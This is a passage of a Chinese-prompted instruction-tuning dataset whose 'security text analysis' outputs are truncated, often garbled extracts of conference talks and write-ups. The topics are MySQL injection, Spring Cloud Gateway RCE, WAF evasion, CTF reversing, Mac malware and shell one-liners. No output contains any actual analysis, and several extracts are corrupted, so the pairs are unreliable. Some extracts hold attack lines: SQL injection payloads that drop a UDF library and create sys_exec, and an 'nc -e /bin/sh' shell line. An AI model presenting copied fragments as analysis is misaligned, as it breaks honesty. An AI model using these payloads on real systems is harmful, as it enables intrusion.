另外还有类值是法不便验证的各个资源的注解字段 annotations 及 labels注解会 被各 controller 或 webhook 动态的去添加 根因分析 istio gateway controller 使 informer 机制 watch 对应资源 GVR 的 k8s apiserver 的端点在资 源变更时做出相应的动作当户提交 kind 为 Gateway 的资源时istio gateway controller 会对 Gateway 资源进解析处理并转化为 Service 及 D", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# shell 编程 --- **shell 和 shell 脚本的区别** - shell 是指一种应用程序这个应用程序提供了一个界面用户通过这个界面访问操作系统内核的服务Ken Thompson 的 sh 是第一种 Unix ShellWindows Explorer 是一个典型的图形界面 Shell - shell 脚本shell script是一种为 shell 编写的脚本程序业界所说的 shell 通常都是指 shell 脚本但是shell 和 shell script 是两个不同的概念 **常见问题** - Linux 下运行 bash 脚本显示\": /usr/bin/env: \"bash\\r\": 没有那个文件或目录 这主要是因为 bash 后面多了 \\r 这个字符的原因.在 linux 终端下,输出 \\r 会什么都不显示,只是把光标移到行首.于是终端虽然输出了 /usr/bin/env bash,但是碰到\\r后,光标会被移到行首,接着输出了:No such file or directory 把前面的覆盖掉了.于是出现了那个莫名其妙的出错信息了 一般来说这是下载在 windows 下载 github 脚本后会遇到的问题,下载压缩包,在 linux 中解压,或直接使用 linux 下载 或者用 vim 打开 sh 脚本文件, 重新设置文件的格式 ```vim :set ff=unix :wq! ``` - linux 运行 shell 出现未预期的符号 `$'do\\r'' 附近有语法错误 看上面应该是语法错误,但无论怎么改还是报错,经过一番探索发现,自己的文件是从 windows 里面拷贝到 linux 的,可能是两种系统格式不一样. 解决方法如下: 1. 打开 notepad++ 编辑 .sh 文件 2. notepad++ 右下角将 windows 模式改为 linux 模式 **source 命令与 `.` 的区别** - source 命令是 bash shell 的内置命令,从 C Shell 而来. - source 命令的另一种写法是点符号,用法和 source 相同,从 Bourne Shell 而来. - source 命令可以强行让一个脚本去立即影响当前的环境. - source 命令会强制执行脚本中的全部命令,而忽略文件的权限. - source 命令通常用于重新执行刚修改的初始化文件,如 .bash_profile 和 .profile 等等. - source 命令可以影响执行脚本的父 shell 的环境,而 export 则只能影响其子 shell 的环境. - source a.sh 同直接执行 ./a.sh 有什么不同呢,比如你在一个脚本里 `export $KKK=111` ,如果你用 ./a.sh 执行该脚本,执行完毕后,你运行 `echo $KKK` ,发现没有值,如果你用 `source` 来执行 ,然后再 `echo` ,就会发现 KKK=111.因为调用 ./a.sh 来执行 shell 是在一个子 shell 里运行的,所以执行后,结果并没有反应到父 shell 里,不过 source 不同,他就是在本 shell 中执行的,所以能看到结果. **sast 工具** - https://github.com/koalaman/shellcheck **资源教程** - [dylanaraps/pure-bash-bible](https://github.com/dylanaraps/pure-bash-bible#get-the-username-of-the-current-user) - [wangdoc/bash-tutorial](https://github.com/wangdoc/bash-tutorial) - Bash 教程 - [穷佐罗的Linux书](https://zorrozou.github.io/) **相关文章** - [10分钟学会Bash调试](https://mp.weixin.qq.com/s/MQjqu55BN6LqSsIAvevRQA) - [如何并发执行Linux命令](https://mp.weixin.qq.com/s/L3u2e-GKl_yL3saJMMFazA) - [终于知道 Shell 中单引号双引号的区别了](https://mp.weixin.qq.com/s/tyHIlRsg1rYjw-E_h-C2rA) - [Bash编程基础知识](https://mp.weixin.qq.com/s/tSWnoO3IAET3C7iYY7ns6Q) - [SHELL编程之执行过程](https://zorrozou.gi", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nOne-Liners to Rule Them All egypt wvu What this is Bash basics  Minor portability considerations One-liners and demos of stuff we find to be useful @egyp7 @wvuuuuuuuuuuuuu What this isnt Linux system administration  Although there is some amount of overlap Reading the man page to you @egyp7 @wvuuuuuuuuuuuuu `man bash` is cavernous There are resources to help From the abstract Sometimes you just need to pull out the third column of a CSV file. Sometimes you just need to sort IP addresses. Sometimes you have to pull out IP addresses from the third column and sort them, but only if the first column is a particular string and for some reason the case is random. Up, edit, enter, repeat cat file cat file | grep open cat file | grep -i open cat file | grep -i open | cut -d, -f3 grep -i open | cut -d, -f3 awk -F, 'tolower($1) ~ /open/ { print $3 }' file | sort -V Conventions Commands are usually suffixed with a man(1) section Almost all of what were talking about here is man section 1 But theres naming overlaps with syscalls (man section 2), C functions (man section 3), and occasionally config files (man section 5) Core Concepts  Pipes and redirection  Variables and substitution  Standard tools  History expansion  Brace expansion  Tilde expansion Pipes and Redirection The following slides are for the folks playing at home. All of this is happening in a shell. Pay no attention to the man behind the curtain. Pipes and Redirection  echo wut | cat  echo wut > /tmp/wut  cat /tmp/wut  cat < /tmp/wut File descriptors: &0 &1 &2 &n nc -e /bin/sh [...] exec 2>&1 exec 3<>/dev/tcp/10.1.1.1/80;echo $'GET / HTTP/1.0\\n' >&3;cat <&3 Standards grep(1), sed(1), cut(1), sort(1), awk(1) Builtins -- echo, test, read, while, for grep Searches in Text Regular expressions are tricky, but you can learn the basics quickly. A large portion of regexes involve these three things:  .* any number of characters   anchor at beginning  $ anchor at end grep '500.*Chrome' /var/log/apache2/error.log sed is an ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAdvanced MySQL Exploitation Muhaimin Dzulfakar Defcon 2009  Las Vegas 1 Who am I Muhaimin Dzulfakar Security Consultant Security-Assessment.com 2 SQL Injection An attack technique used to exploit web sites that construct SQL statement from user input Normally it is used to read, modify and delete database data In some cases, it is able to perform remote code execution 3 What is a stacked query ? Condition where multiple SQL statements are allowed. SQL statements are separated by semicolon Stack query commonly used to write a file onto the machine while conducting SQL Injection attack Blackhat Amsterdam 2009, Bernando Damele demonstrated remote code execution performed through SQL injection on platforms with stacked query Today I will demonstrate how to conduct remote code execution through SQL injection without stacked query MySQL-PHP are widely use but stacked query is not allowed by default to security reason 4 Abusing stacked queries on MySQL query.aspx?id=21; create table temp(a blob); insert into temp values (0x789c414141)-- query.aspx?id=21; update temp set a = replace (a, 414141, query.aspx?id=21; update temp set a = replace (a, 414141, 9775..71)-- query.aspx?id=21; select a from temp into dumpfile /var/lib/mysql/lib/udf.so-- query.aspx?id=21; create function sys_exec RETURNS int SONAME 'udf.so-- 5 Stacked query table ASP.NET ASP PHP MySQL Supported Not supported Not Supported MySQL Supported Not supported Not Supported MSSQL Supported Supported Supported Postgresql Supported Supported Supported 6 Remote code execution on MySQL-PHP Traditionally, simple PHP shell is used to execute command Command is executed as a web server user only Weak and has no strong functionality We need a reliable shell! Metasploit contains variety of shellcodes Meterpreter shellcode for post exploitation process VNC shellcode for GUI access on the host 7 File read/write access on MySQL-PHP platform SELECT .. LOAD_INFILE is used to read file SELECT .. INTO OUTFILE/DUMPFILE is used to", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n'\\\" '\\\" Copyright (c) 1993 The Regents of the University of California. '\\\" Copyright (c) 1994-1997 Sun Microsystems, Inc. '\\\" '\\\" See the file \"license.terms\" for information on usage and redistribution '\\\" of this file, and for a DISCLAIMER OF ALL WARRANTIES. '\\\" '\\\" RCS: @(#) $Id: switch.n,v 1.2 2003/11/24 05:10:00 bbbush Exp $ '\\\" '\\\" The definitions below are for supplemental macros used in Tcl/Tk '\\\" manual entries. '\\\" '\\\" .AP type name in/out ?indent? '\\\" Start paragraph describing an argument to a library procedure. '\\\" type is type of argument (int, etc.), in/out is either \"in\", \"out\", '\\\" or \"in/out\" to describe whether procedure reads or modifies arg, '\\\" and indent is equivalent to second arg of .IP (shouldn't ever be '\\\" needed; use .AS below instead) '\\\" '\\\" .AS ?type? ?name? '\\\" Give maximum sizes of arguments for setting tab stops. Type and '\\\" name are examples of largest possible arguments that will be passed '\\\" to .AP later. If args are omitted, default tab stops are used. '\\\" '\\\" .BS '\\\" Start box enclosure. From here until next .BE, everything will be '\\\" enclosed in one large box. '\\\" '\\\" .BE '\\\" End of box enclosure. '\\\" '\\\" .CS '\\\" Begin code excerpt. '\\\" '\\\" .CE '\\\" End code excerpt. '\\\" '\\\" .VS ?version? ?br? '\\\" Begin vertical sidebar, for use in marking newly-changed parts '\\\" of man pages. The first argument is ignored and used for recording '\\\" the version when the .VS was added, so that the sidebars can be '\\\" found and removed when they reach a certain age. If another argument '\\\" is present, then a line break is forced before starting the sidebar. '\\\" '\\\" .VE '\\\" End of vertical sidebar. '\\\" '\\\" .DS '\\\" Begin an indented unfilled display. '\\\" '\\\" .DE '\\\" End of indented unfilled display. '\\\" '\\\" .SO '\\\" Start of list of standard options for a Tk widget. The '\\\" options follow on successive lines, in four columns separated '\\\" by tabs. '\\\" '\\\" .SE '\\\" End of list of standard options for a Tk widget. '\\\" '\\\" .OP cmdName dbName dbClas", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nReverse&Engineering&& Mac&Malware&& Sarah&Edwards&& @iamevltwin& mac4n6.com& & whoami& Senior&Digital&Forensics&Analyst&with&Harris&CorporaAon&  Computer&Intrusions,&Criminal,&Counter&Terrorism,&Counter&Intelligence&  Mac,&Windows,&*nix,&Mobile,&Malware,&anything&&&everything& Government&Contractor&N&Embedded&FullAme&with&Federal&Law& Enforcement& General&Forensics&Nerd&&&Mac&Fan&Girl& Author&&&Instructor&for&SANS&FOR518&&Mac&Forensic&Analysis&  www.sans.org/course/macNforensicNanalysis& Scope&&&Agenda& Malware&Triage& ~20%&StaAc,&~80%&Dynamic& No&Assembly& Agenda:&  StaAc&Analysis&  File&Types&  Analysis&Tools&  Dynamic&Analysis&  VirtualizaAon&  ApplicaAon&Tracing&  Analysis&Tools&  Analysis&Examples& StaAc&Analysis& Locate&&&Extract&the&Executable&Files& File&Types:&  ApplicaAon&Bundles&  MachNO&  PKG&Files& Tools:&  MachOView&  lipo&  Strings&||&srch_strings&  nm&  codesign&  Hopper& Locate&the&Malware& ApplicaAon&Bundle&(*.app)& PKG&File& MachNO&Executable& & Office&Document& ZIP&Archive& JAR&File& others& ApplicaAon&Bundle& Directory& Contents:&  Info.plist&(required)&  ConfiguraAon&InformaAon&  Executable&(required)&  Located&anywhere&in&bundle&  MacOS&Directory&  Executable&may&be&in&here&too!&  Resources&Directory&  SupporAng&Files& ApplicaAon&Bundle& Crisis&Sample&  Executables:&  IZsROY7X.-MP!  lUnsA3Ci.Bz7!  mWgpX-al.8Vq!  Kernel&Extension&=& 6EaqyFfo.zIK.kext! PKG&File& eXtensible&ARchiver& (XAR)&Archive& Flashback&used&a&fake& FlashPlayerN11N macos.pkg&Installer& PKG&Files& List&&&Extract&the&Malware& PKG&Files& List&&&Extract&the&Malware& PKG&Files& List&&&Extract&the&Malware&  *N1&(First&unar&N&gzip)&  *N1N1&(Second&unar&N&cpio)& MachNO&Binaries&  Executable&Format&used&on&OS&X&  Universal&(Fat)&Binaries&  File&Signatures:&  0xCAFEBABE&&Fat&binary&  0xFEEDFACE&&32Nbit&  0xFEEDFACF&&64Nbit&  0xCEFAEDFE&&32Nbit,&Lirle&Endian&  0xCFFAEDFE&&64Nbit,&Lirle&Endian& 32NBit/Lirle&Endian& MachNO&Binaries& Universal/Fat&Binaries& Intel&32&&&64Nbit& Universal&&Powe", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nTHESE ARENT THE PERMISSIONS YOURE LOOKING FOR Anthony Lineberry David Luke Richardson Tim Wyatt DefCon 18 AGENDA  Android Internals Overview  Security/Permission Model  Why Ask For Permission When You Can Ask For Forgiveness?  Log-Cat  Our Inside Mole  The Ultimate Permission (Yes, were talking about root)  Mitigation ANDROID INTERNALS Diving Into the Belly of the Beast ANDROID MANIFEST  AndroidManifest.xml  Every application must have one  Declares the package name, a unique identifier for every app  Describes applications components (Activities, Services, BroadcastReceivers, etc)  Declares requested permissions needed to access protected APIs (If only there were a way to get around that...)  Declares permissions other applications are required to have to interact with applications components ACTIVITY  A way for users to interact with the application  Composed of Views:  Button  TextView  ImageView  etc... ACTIVITY  Managed as an Activity stack  New/foreground activity on top of stack. In running/active state  Previous Activities below in paused state  Removed from stack when Activity finishes ACTIVITY  An application can start another applications Activity!  Activity runs in its applications process.  Callee doesnt necessarily have access to Activitys data  Permission attribute in manifest can restrict who can start the permission INTENT  An abstract description of an operation to be performed  Simple IPC for applications  Intents can be sent with data INTENT  Can be used to start an Activity with startActivity()  Intents can be broadcast system wide with sendBroadcast()  Communicate with a background Service  Two main components:  Action  Data (URI: http:, content:, geo:, etc...) Intent myIntent = new Intent(Intent.ACTION_VIEW, Uri.parse(\"http://www.google.com\")); startActivity(myIntent); BROADCAST RECEIVER  Receives an Intent  Can be created dynamically with registerBroadcast() or declared in the manifest with the <receiver> tag  Receives two types of broadcasts: ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNathan Seidle SparkFun Electronics Combos in 45 minutes or less!* *You know what these mean 2002 Animation: How combination safe works Power! Motor with 8400 tick encoder Servo with feedback Arduino Handle puller Magnets Erector set (Actobotics) The super freaking amazing nautilus gear that made this all work Come back here spring Standard servo with analog feedback hack Very fancy string Go! Btn Servo and feedback Motor Driver Beep! Current Sensor Motor control and feedback Display RedBoard = Arduino 12V External Hard Drive Power Supply Home Photogate Problem Domain: 1003 combinations 10 seconds per test 115 days (worst case) Exploits Combinations: 1003 combinations Exploits Combinations: 1003 combinations 333 combinations = 4.15 days Exploits Combinations: 1003 combinations 333 combinations = 4.15 days Disc C has 12 indents 332 * 12 = 1.5 days Exploits Exploits Disc C: Outer diameter: 2.815 (55.5mm) Width of solution slot: 0.239 Width of 11 indents: 0.249 +/- 0.002 17.69 (Circumference) / 8400 ticks 0.0021 / tick ~5 ticks smaller Exploits Combinations: 1003 combinations 333 combinations = 4.15 days Disc C has 12 indents 332 * 12 = 1.5 days Disc C has a skinny indent 332 * 1 = 3 hours Exploits Test Time: Resetting Dials = 10s / test Exploits Test Time: Resetting Dials = 10s / test Set testing = 4s / test 1.2 hours Exploits Luck Test Time: Resetting Dials = 10s / test Set testing = 4s / test 1.2 hours 45 minutes! Animation: How Set Testing Works How do I protect myself!? One of these is not like the others... The S&G 6741  can be dialed up to 1.25 digits above or below the actual set number and still open, essentially giving you a 2.5 digit window to hit. The S&G 6730, however, has only a +/- .5 dialing tolerance, essentially giving a 1 digit window to hit. While many locksmiths might prefer the S&G 6730, it can be notoriously difficult to open and very unforgiving to human error. In addition, slight alterations to the lock (for example, if the dial or the dial ring", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n云@金山 Cloud at KINGSOFT --一种不同的思路做云安全 A different thought in cloud-based security 演讲人: CardMagic (孙明焱) 金山网络 KINGSOFT Agenda 金山云体系 KINGSOFT cloud artitecture 金山云防御 KINGSOFT cloud defense 金山云查杀 KINGSOFT cloud-based anti-virus 关于演讲者 About the speaker 孙明焱 ID: CardMagic -现任金山网络产品总监负责金山毒霸相关开发 current product director of KINGSOFT, who is responsible for the development of 金山毒霸 -曾任奇虎360云查杀产品负责人 previous chief developer of Qihoo 360 Cloud-based anti-virus -曾任Trend Micro技术经理 previous technology manager of Trend Micro -曾任NEC开发工程师 precious programmer of NEC -Antirootkit工具DarkSpy的作者(被趋势科技收购 creator of DarkSpy,a tool of Antirootkit. (purchased by Trend) -精通各类安全开发曾负责开发过各类云安全产品 specialize in various security development. Develop abundant security products. 金山云体系-信息安全问题的源头 KINGSOFT cloud architecture  the cause of security problem 病毒 Virus 病毒作者+产业链 Virus Creator+ Crimeware Industry 病毒技术 Virus technique  杀毒软件 Anti-Virus Software 反病毒厂商 Anti-Virus Company 反病毒技术 Anti-Virus technique  对抗 金山云体系-云端智能鉴定技术 KINGSOFT cloud architecture: Cloud intelligence of Forensics 海量样本 Enormous Samples 样本相关信息 Information from Samples 数据挖掘技术 Data Mining technique 10年病毒技术跟进 和积累的经验 Ten-years knowledge of Virus technique and accumulated experience. 金山云体系-常规云安全 KINGSOFT cloud architecture The security of regular cloud? 病毒作者 Creator of Virus 1 用户1 User 1 后台自动系统 Automatic backend system 2 3 4 特征自动发布 Automatic signatures publishing 5 中毒啦中毒啦 Infected by Virus 互联网 Internet 放个木马赚钱罗 Make money from malwares 用户2 User 2 云防住啦 Safe! Protected by Cloud 金山云体系-黑色产业链解决(1) KINGSOFT cloud architecture: Solution of Crimeware industry 病毒作者 Creator of Virus 1 用户 User 鹰眼系统 Hawkeye Monitoring system 后台自动系统 Automatic backend system 2 3 4 特征自动发布 Automatic signatures publishing 5 小子一直盯着你呢  I WATCH YOU !  哦有个木马有 金山云支持我不怕 互联网 Interne t 放个木马赚钱罗 Make money from malwares 金山云体系-黑色产业链解决(2) KINGSOFT cloud architecture: Solution of Crimeware industry  为什么要产业链 How does knowing crimeware industry assist us in Virus detection? - 产业链做为直接鉴定器鉴定文件与URL ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nINTRODUCTION TO HARDWARE HACKING HOW YOU TOO CAN FIND A DECADE OLD BUG IN WIDELY DEPLOYED DEVICES AVAYA 9600 DESKPHONE A CASE STUDY WHO AM I ?  PHILIPPE LAULHERET  SENIOR SECURITY RESEARCHER FOR MCAFEE'S ADVANCED THREAT RESEARCH  @PHLAUL  2 YEARS EMBEDDED SECURITY, 4 YEARS C++ DEV WHY SHOULD YOU CARE ABOUT HARDWARE HACKING? AVAYA 9600 SERIES IP DESKPHONE  2ND LARGEST VOIP SOLUTION PROVIDER  90% OF FORTUNE 100  9600 SERIES STARTED IN 2006, SOON EOL PRIOR ART  LOTS OF DOCUMENTATION ABOUT HARDWARE HACKING (SEE LAST SLIDE FOR LINKS)  INTRODUCTION TO ARM  HARDWARE HACKING BLOGS (ROUTERS, IOT, )  ACCESSIBLE INTRODUCTION TO ELECTRONICS (ADAFRUIT, SPARKFUN)  EMBEDDED CAPTURE THE FLAG  HARDWARE HACKING VILLAGE    RED BALLOON SECURITY FOUND 2 RCE IN THE SAME SERIES OF PHONE  STEPPING P3WNS, RSA 2014 THE NEXT 40 MINUTES  USE THE PHONE AS A SPRINGBOARD TO TALK ABOUT HARDWARE HACKING  SHARE THE HOW, WHY, WHAT IF, FAILED ATTEMPTS, ETC.  IF I CAN DO IT, SO CAN YOU! HOW DID THIS PROJECT START? FIRST STEP: RECON  IF IT HAS RADIO (WIFI, BLUETOOTH,) IT WILL BE ON THE FCC WEBSITE Source: https://fccid.io/TYM-9641GS (not our phone model, but part of the same 96xx series) Source: https://fccid.io/TYM-9641GS FIRST STEP: RECON  IF IT HAS RADIO (WIFI, BLUETOOTH,) IT WILL BE ON THE FCC WEBSITE  FIND ONLINE MANUALS, MARKETING MATERIAL, ETC. FIRST STEP: RECON  IF IT HAS RADIO (WIFI, BLUETOOTH,) IT WILL BE ON THE FCC WEBSITE  FIND ONLINE MANUALS, MARKETING MATERIAL, ETC.  FIND FORUM OF USERS (SYSADMIN, )  LOOK ONLINE FOR FIRMWARE DOWNLOADS WHAT DO WE DO NOW? LETS VOID WARRANTIES! IDENTIFYING THE MAIN COMPONENTS  USUALLY WE CAN FIND  CPU (MAYBE MORE THAN ONE) OR SYSTEM ON CHIP (SOC)  RAM  ON BOARD STORAGE (FLASH CHIP, EEPROM, SDCARD, )  WIFI/BLUETOOTH MODULE (MAYBE UNDER A METALLIC SHIELD)    COMPONENTS HAVE LABELS PRINTED ON THEM  GOOGLE THE LABEL TO FIND MORE INFORMATION  DATASHEET TELL YOU HOW TO USE THE COMPONENT  SOMETIMES DATASHEET ARE NOT PUBLICLY AVAILABLE RAM CPU ??? UART UART Keyed RJ4", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n## Reverse 400 (re, 400p) ### PL [ENG](#eng-version) Najtrudniejsze zadanie z RE na tym CTFie. Dostajemy [program](./r400) (znowu elf), który pobiera od usera hasło. Domyślamy się że to hasło jest flagą. Tutaj niespodzianka, bo hasło nie jest sprawdzane nigdzie w programie. Po chwili grzebania/debugowania, okazuje się, że hasło jest zamieniane na DWORD (cztery znaki) i pewna tablica bajtów jest \"deszyfrowana\" (tzn. xorowana) z nim, a następnie wykonywana. Xorowane dane wyglądają tak: 5E 68 0E 59 46 06 47 5E 55 11 15 41 5C 0A 03 16 44 0A 08 52 14 16 0E 16 52 0D 13 5E 14 3B 09 43 5C 0D 08 45 15 0A 0A 57 40 0B 0E 44 55 16 13 5E 77 0D 08 51 8E 48 66 36 34 EB 87 8D 35 62 66 36 8C 66 66 36 34 AF E6 8E 35 62 66 36 F9 E2 F6 A6 Pierwsze próby zgadnięcia hasła nie udały się (myśleliśmy że może ten fragment to funkcja, i zacznie się jakimś klasycznym prologiem). Ale szybko wpadliśmy na lepszy pomysł. Otóż jaki jest najczęściej spotykany bajt w kodzie? Oczywiście zero. Więc jeśli znajdziemy najczęściej występujący bajt w zaszyfrowanym fragmencie, będziemy wiedzieli że prawdopodobnie były to oryginalnie zera. Kod wyszukujący najczęstsze bajty: source = '5E680E594606475E551115415C0A0316440A085214160E16520D135E143B09435C0D0845150A0A57400B0E445516135E770D08518E48663634EB878D356266368C66663634AFE68E35626636F9E2F6A6'.decode('hex') prologue = '554889E5'.decode('hex') def xor(a, b): return ''.join(chr(ord(ac)  ord(bc)) for ac, bc in zip(a, b)) print xor(source, prologue).encode('hex') a0 = source[0::4] a1 = source[1::4] a2 = source[2::4] a3 = source[3::4] def most_common(x): import collections s = collections.Counter(x).most_common(1)[0] return (s[0].encode('hex'), s[1]) print most_common(a0), print most_common(a1), print most_common(a2), print most_common(a3), Okazało się to być strzałem w dziesiątkę! (Jeśli dobrze pamiętamy, jeden z czterech fragmentów źle trafił, ale udało się to już ręcznie poprawić trywialnie). W ten sposób rozwiązaliśmy najtrudniejsze zadanie RE na CTFie i zdobyl", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nLets Get Physical Network Attacks Against Physical Security Systems Ricky HeadlessZeke Lawshae  Defcon24  2016 Intro Let's Get Physical 3 Intro Who am I?  Security Researcher at TippingPoint  IoT (drink!) hacking enthusiast  Occasional conference presenter  Used to install physical security systems for a living Who am I?  Security Researcher at TippingPoint  IoT (drink!) hacking enthusiast  Occasional conference presenter  Used to install physical security systems for a living Let's Get Physical 4 Intro Physical Security  Electronic or mechanical devices used for  Access control  Surveillance  Alarms  Card readers, door controls, video cameras, DVRs, motion sensors, fire alarms, tamper switches, etc etc etc Physical Security  Electronic or mechanical devices used for  Access control  Surveillance  Alarms  Card readers, door controls, video cameras, DVRs, motion sensors, fire alarms, tamper switches, etc etc etc Let's Get Physical 5 Intro Deployment  Used by basically every organization of any size  Piece by piece getting put on the network  Acknowledge alarms and watch cameras  Push schedule and access changes  Pull logs and reports  Physical is becoming digital...IoT (drink!) Deployment  Used by basically every organization of any size  Piece by piece getting put on the network  Acknowledge alarms and watch cameras  Push schedule and access changes  Pull logs and reports  Physical is becoming digital...IoT (drink!) Let's Get Physical 6 Intro Embedded devices accessible via the network protecting valuable assets in every organization ...Should be fine! Embedded devices accessible via the network protecting valuable assets in every organization ...Should be fine! Access Control Let's Get Physical 8 Access Control Overview  Locking mechanism  ID mechanism  Sensors  Management software  Monitoring  Access and schedule changes  Override lock states Overview  Locking mechanism  ID mechanism  Sensors  Management software  Monitoring  Access and schedule changes  Override ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCaendra Inc. 2020 All Rights Reserved Web Application Penetration Testing eXtreme /*<EVASION>*/ S e c t i o n 0 1 | M o d u l e 0 2 WAPTXv2: Section 01, Module 02 - Caendra Inc.  2020 Table of Contents MODULE 02 | /*<EVASION>*/ 2.1 Base64 Encoding Evasion 2.2 URI Obfuscation Techniques 2.3 JavaScript Obfuscation Techniques 2.4 PHP Obfuscation Techniques | p.2 WAPTXv2: Section 01, Module 02 - Caendra Inc.  2020 We have seen how countermeasures against web application attacks can be implemented. Sometimes, they are not sufficient and can easily be circumvented. There are two solutions: attack vector optimization and using obfuscation techniques. The last one has been used heavily in web attacks, in the last 10 years. Introduction & Learning Objectives | p.3 WAPTXv2: Section 01, Module 02 - Caendra Inc.  2020 Evading detection techniques is like playing \"cops and robbers\". Security researchers (the robbers), arrange a way to evade detection systems. They use the technique for a time, but then it becomes public. Next, the cops (the defenders) implement a solution to fix the vulnerabilities. Now it's time to produce a new technique for the robbers! Introduction & Learning Objectives | p.4 WAPTXv2: Section 01, Module 02 - Caendra Inc.  2020 Learning Objectives In this module, we will cover Evasion techniques > Encoding + Obfuscation. | p.5 WAPTXv2: Section 01, Module 02 - Caendra Inc.  2020 2.1 Base64 Encoding Evasion | p.6 WAPTXv2: Section 01, Module 02 - Caendra Inc.  2020 We have seen in the filter section how detection systems implement a Regex-based system that searches for malicious strings. Lets suppose that we want to evade a system that inspects JavaScript code for specific keywords like eval, alert, prompt, document.cookie, or other potential malicious strings. 2.1 Base64 Encoding Evasion | p.7 WAPTXv2: Section 01, Module 02 - Caendra Inc.  2020 A possible way to escape these kinds of filters is by using Base64 encoding. Lets setup an evasion technique for a sim", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCVE-2022-22947 SpringCloud GateWay SPEL RCE echo response 环境 git clone https://github.com/spring-cloud/spring-cloud-gateway cd spring-cloud-gateway git checkout v3.1.0 审计 看diff https://github.com/spring-cloud/spring-cloud- gateway/commit/337cef276bfd8c59fb421bfe7377a9e19c68fe1e org.springframework.cloud.gateway.support.ShortcutConfigurable#getValue这个函数用 GatewayEvaluationContext替换了StandardEvaluationContext来执行spel表达式 回溯执行点 说明是个spel表达式的rce向上回溯找到 org.springframework.cloud.gateway.support.ShortcutConfigurable.ShortcutType枚举 找到四个地方都在ShortcutConfigurable接口类里分布在ShortcutType的三个枚举值见上图圈 起来的部分 三个枚举值都重写了 org.springframework.cloud.gateway.support.ShortcutConfigurable.ShortcutType#normalize函数 在ShortcutConfigurable接口类中有一个虚拟拓展方法shortcutType()用到的是 ShortcutType.DEFAULT枚举 继续向上查找shortcutType()函数的引用到 org.springframework.cloud.gateway.support.ConfigurationService.ConfigurableBuilder#normaliz eProperties 这个normalizeProperties()是对filter的属性进行解析会将filter的配置属性传入normalize中,最后 进入getValue执行SPEL表达式造成SPEL表达式注入 正向看filter 根据文档https://cloud.spring.io/spring-cloud-gateway/multi/multi__actuator_api.html 来看用 户可以通过actuator在网关中创建和删除路由 路由格式 在idea中通过actuator的mapping功能找到controller 然后看RouteDefinition 其中FilterDefinition类需要有一个name和args键值对 而name在创建路由的时候进行了校验 name需要和已有的filter相匹配 动态调试看一下已有的name 那么到这里利用已经呼之欲出了 复现 先创建路由filter中填充spel表达式然后refresh执行 name用到了RewritePath对应的是 org.springframework.cloud.gateway.filter.factory.RewritePathGatewayFilterFactory#apply 需要注意的是这里args中键名要填充replacement属性不然会报空指针 然后refresh rce 堆栈如下 getValue:251, SpelExpression (org.springframework.expression.spel.standard) getValue:60, ShortcutConfigurable (org.springframework.cloud.gateway.support) normalize:94, ShortcutConfigurable$ShortcutType$1 (org.springframework.cloud.gateway.support) normalizeProperties:140, ConfigurationService$ConfigurableBuilder (org.springframework.cloud.gateway.support) bind:241, ConfigurationService$AbstractBuilder (org.springframework.cloud.gateway.support) loadGatewayFilters:144, RouteDefinitionRouteLocator (org.springfram", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nThe Psychology of SecurityDRAFT June 28, 2007 Bruce Schneier 13544 words Introduction Security is both a feeling and a reality. And theyre not the same. The reality of security is mathematical, based on the probability of different risks and the effectiveness of different countermeasures. We can calculate how secure your home is from burglary, based on such factors as the crime rate in the neighborhood you live in and your door- locking habits. We can calculate how likely it is for you to be murdered, either on the streets by a stranger or in your home by a family member. Or how likely you are to be the victim of identity theft. Given a large enough set of statistics on criminal acts, its not even hard; insurance companies do it all the time. We can also calculate how much more secure a burglar alarm will make your home, or how well a credit freeze will protect you from identity theft. Again, given enough data, its easy. But security is also a feeling, based not on probabilities and mathematical calculations, but on your psychological reactions to both risks and countermeasures. You might feel terribly afraid of terrorism, or you might feel like its not something worth worrying about. You might feel safer when you see people taking their shoes off at airport metal detectors, or you might not. You might feel that youre at high risk of burglary, medium risk of murder, and low risk of identity theft. And your neighbor, in the exact same situation, might feel that hes at high risk of identity theft, medium risk of burglary, and low risk of murder. Or, more generally, you can be secure even though you dont feel secure. And you can feel secure even though youre not. The feeling and reality of security are certainly related to each other, but theyre just as certainly not the same as each other. Wed probably be better off if we had two different words for them. This essay is my initial attempt to explore the feeling of security: where it comes from, how it works, and why it", "category": "text_analysis", "source": "security_papers"}
